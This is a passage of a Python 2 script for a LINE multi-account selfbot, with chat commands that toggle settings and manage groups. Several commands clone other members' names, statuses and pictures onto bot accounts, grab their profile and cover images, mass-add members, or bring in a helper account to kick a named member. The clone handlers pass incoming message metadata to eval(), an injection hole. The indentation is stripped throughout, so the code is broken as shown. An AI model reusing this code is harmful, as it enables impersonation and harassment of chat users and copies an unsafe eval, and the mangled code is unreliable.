cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
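# "Settings" prints the current value of every toggle held in the wait dict.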
elif msg.text in ["Settings","Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs up Har Har")
kk.sendText(msg.to,"PONG double thumbs up Har Har")
kc.sendText(msg.to,"PONG double thumbs up Har Har")
ks.sendText(msg.to,"PONG double thumbs up Har Har")
kt.sendText(msg.to,"PONG double thumbs up Har Har")
cl.sendText(msg.to,"PONG double thumbs up Har Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#-------------------------------------------------------
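# "Gift @<name>" sends a LINE theme gift to the tagged member by rewriting the message into a contentType 9 (gift) payload with PRDID metadata.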
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " "
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " "
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " "
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " "
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " "
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
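# "Steal cover @<name>" looks up the tagged member, fetches their cover image URL via the channel API, and re-posts it to the chat.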
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy1 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy1 @","")
_nametarget = _name.rstrip(' ')
gs = kk.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kk.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kk.CloneContactProfile(target)
kk.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy2 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy2 @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy3 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy3 @","")
_nametarget = _name.rstrip(' ')
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kc.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kc.CloneContactProfile(target)
kc.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy4 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy4 @","")
_nametarget = _name.rstrip(' ')
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ks.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ks.CloneContactProfile(target)
ks.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy5 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy5 @","")
_nametarget = _name.rstrip(' ')
gs = kt.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kt.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kt.CloneContactProfile(target)
kt.sendText(msg.to, "Copied.")
except Exception as e:
print e
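# "Backup"/"backup" restores the main account's profile from the in-memory backup object (presumably a profile snapshot taken at startup).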
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
kt.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali ke asli"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
kt.updateDisplayPicture(backup.pictureStatus)
kt.updateProfile(backup)
cl.sendText(msg.to, "Backup Astro Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
#===============================================
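# "Debug speed" below times a local sleep, so it reports near-zero; "Speed"/"Sp" further down times an actual sendText call.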
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sentText(msg.to,"Berhasil Dihapus")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,str(error))
#-------------------------------------------------------
#--------------------------------------------------------
elif "Ban group: " in msg.text:
grp = msg.text.replace("Ban group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == grp:
wait["BlGroup"][i]=True
cl.sendText(msg.to, "Success Ban Group : "+grp)
else:
pass
else:
cl.sendText(msg.to, "Khusus Creator")
#--------------------------------------------------------
elif msg.text in ["List ban","List ban group"]:
if msg.from_ in admin:
if wait["BlGroup"] == {}:
ki.sendText(msg.to,"nothing")
kk.sendText(msg.to,"nothing")
kc.sendText(msg.to,"nothing")
else:
mc = ""
for gid in wait["BlGroup"]:
mc += "-> " +cl.getGroup(gid).name + "\n"
ki.sendText(msg.to,"===[Ban Group]===\n"+mc)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif msg.text in ["Del ban: "]:
if msg.from_ in admin:
ng = msg.text.replace("Del ban: ","")
for gid in wait["BlGroup"]:
if cl.getGroup(gid).name == ng:
del wait["BlGroup"][gid]
cl.sendText(msg.to, "Success del ban "+ng)
else:
pass
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Join group: " in msg.text:
ng = msg.text.replace("Join group: ","")
gid = cl.getGroupIdsJoined()
try:
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[Creator])
cl.sendText(msg.to,"Success join to ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
except Exception as e:
cl.sendMessage(msg.to, str(e))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
elif "Set member: " in msg.text:
if msg.from_ in admin:
jml = msg.text.replace("Set member: ","")
wait["Members"] = int(jml)
cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Add all" in msg.text:
if msg.from_ in admin:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "Ulti " in msg.text:
if msg.from_ in admin:
ulti0 = msg.text.replace("Ulti ","")
ulti1 = ulti0.rstrip()
ulti2 = ulti1.replace("@","")
ulti3 = ulti2.rstrip()
_name = ulti3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
nl.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets ==[]:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
nl.kickoutFromGroup(msg.to,[target])
nl.leaveGroup(msg.to)
print (msg.to,[g.mid])
except:
nl.sendText(msg.t,"Ter ELIMINASI....")
nl.sendText(msg.to,"WOLES brooo....!!!")
nl.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "loading.....")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
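# "BotN backup run" snapshots bot N's display name, status message, and picture status into three text files; "BotN backup" further down restores from them.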
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
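# "BotN clone @user" copies the mentioned user's display name, status message, and picture onto bot N. The MENTION metadata parsed with eval() below is plain JSON, so json.loads would be the safer parser.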
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
